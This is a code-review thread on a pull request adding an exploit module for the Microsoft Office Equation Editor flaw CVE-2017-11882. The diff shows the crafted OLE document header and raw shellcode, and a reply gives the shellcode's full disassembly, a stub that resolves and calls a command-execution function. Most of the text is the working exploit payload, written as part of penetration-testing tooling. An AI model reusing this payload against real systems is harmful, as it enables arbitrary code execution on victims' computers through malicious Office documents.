modules/exploits/windows/fileformat/office_ms17_11882.rb

```diff
@@ -0,0 +1,258 @@
+    header << '00000000000000000000000000000000000000000000000000000000000000000'
+    header << '000000000000000000000000000000000a000201ffffffffffffffffffffffff0'
+    header << '00000000000000000000000000000000000000000000000000000000000000000'
+    header << '000000000000001400000000000000010043006f006d0070004f0062006a00000'
+    header << '00000000000000000000000000000000000000000000000000000000000000000'
+    header << '0000000000000000000000000000120002010100000003000000ffffffff00000'
+    header << '00000000000000000000000000000000000000000000000000000000000000000'
+    header << '0001000000660000000000000003004f0062006a0049006e0066006f000000000'
+    header << '00000000000000000000000000000000000000000000000000000000000000000'
+    header << '00000000000000000000000012000201ffffffff04000000ffffffff000000000'
+    header << '00000000000000000000000000000000000000000000000000000000000000003'
+    header << '0000000600000000000000feffffff02000000fefffffffeffffff05000000060'
+    header << '0000007000000feffffffffffffffffffffffffffffffffffffffffffffffffff'
+    header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+    header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+    header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+    header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+    header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+    header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+    header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+    header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+    header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+    header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+    header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+    header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+    header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+    header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+    header << 'ffffff01000002080000000000000000000000000000000000000000000000000'
+    header << '00000000000000000000000000000000000000000000000000000000000000000'
+    header << '00000100feff030a0000ffffffff02ce020000000000c00000000000004617000'
+    header << '0004d6963726f736f6674204571756174696f6e20332e30000c00000044532045'
+    header << '71756174696f6e000b0000004571756174696f6e2e3300f439b27100000000000'
+    header << '00000000000000000000000000000000000000000000000000000000000000000'
+    header << "00000300040000000000000000000000000000000000000000000000000000000"
+    header << "000000000000000000000000000000000000000000000000000000000000000\n"
+
+
+    shellcode = "\x1c\x00\x00\x00\x02\x00\x9e\xc4\xa9\x00\x00\x00\x00\x00\x00\x00"
```

Comment:
We'll need some documentation or provenance on the shellcode.  Either one large block comment or traditional side comments of each instruction.  If you reused someone else's and they happen to have that, you can link it and we may be able to push this through and do it afterwards.

Reply:
No problem, I did use someone elses, and ...Ill go find it :)

Reply:
Disassembly of the shellcode 
```
    0:   1c 00                   sbb    al,0x0
    2:   00 00                   add    BYTE PTR [eax],al
    4:   02 00                   add    al,BYTE PTR [eax]
    6:   9e                      sahf
    7:   c4 a9 00 00 00 00       les    ebp,FWORD PTR [ecx+0x0]
    d:   00 00                   add    BYTE PTR [eax],al
    f:   00 c8                   add    al,cl
   11:   a7                      cmps   DWORD PTR ds:[esi],DWORD PTR es:[edi]
   12:   5c                      pop    esp
   13:   00 c4                   add    ah,al
   15:   ee                      out    dx,al
   16:   5b                      pop    ebx
   17:   00 00                   add    BYTE PTR [eax],al
   19:   00 00                   add    BYTE PTR [eax],al
   1b:   00 03                   add    BYTE PTR [ebx],al
   1d:   01 01                   add    DWORD PTR [ecx],eax
   1f:   03 0a                   add    ecx,DWORD PTR [edx]
   21:   0a 01                   or     al,BYTE PTR [ecx]
   23:   08 5a 5a                or     BYTE PTR [edx+0x5a],bl
   26:   b8 44 eb 71 12          mov    eax,0x1271eb44
   2b:   ba 78 56 34 12          mov    edx,0x12345678
   30:   31 d0                   xor    eax,edx
   32:   8b 08                   mov    ecx,DWORD PTR [eax]
   34:   8b 09                   mov    ecx,DWORD PTR [ecx]
   36:   8b 09                   mov    ecx,DWORD PTR [ecx]
   38:   66 83 c1 3c             add    cx,0x3c
   3c:   31 db                   xor    ebx,ebx
   3e:   53                      push   ebx
   3f:   51                      push   ecx
   40:   be 64 3e 72 12          mov    esi,0x12723e64
   45:   31 d6                   xor    esi,edx
   47:   ff 16                   call   DWORD PTR [esi]
   49:   53                      push   ebx
   4a:   66 83 ee 4c             sub    si,0x4c
   4e:   ff 10                   call   DWORD PTR [eax]
   50:   90                      nop
   51:   90                      nop
```

Reply:
I'll put it next to it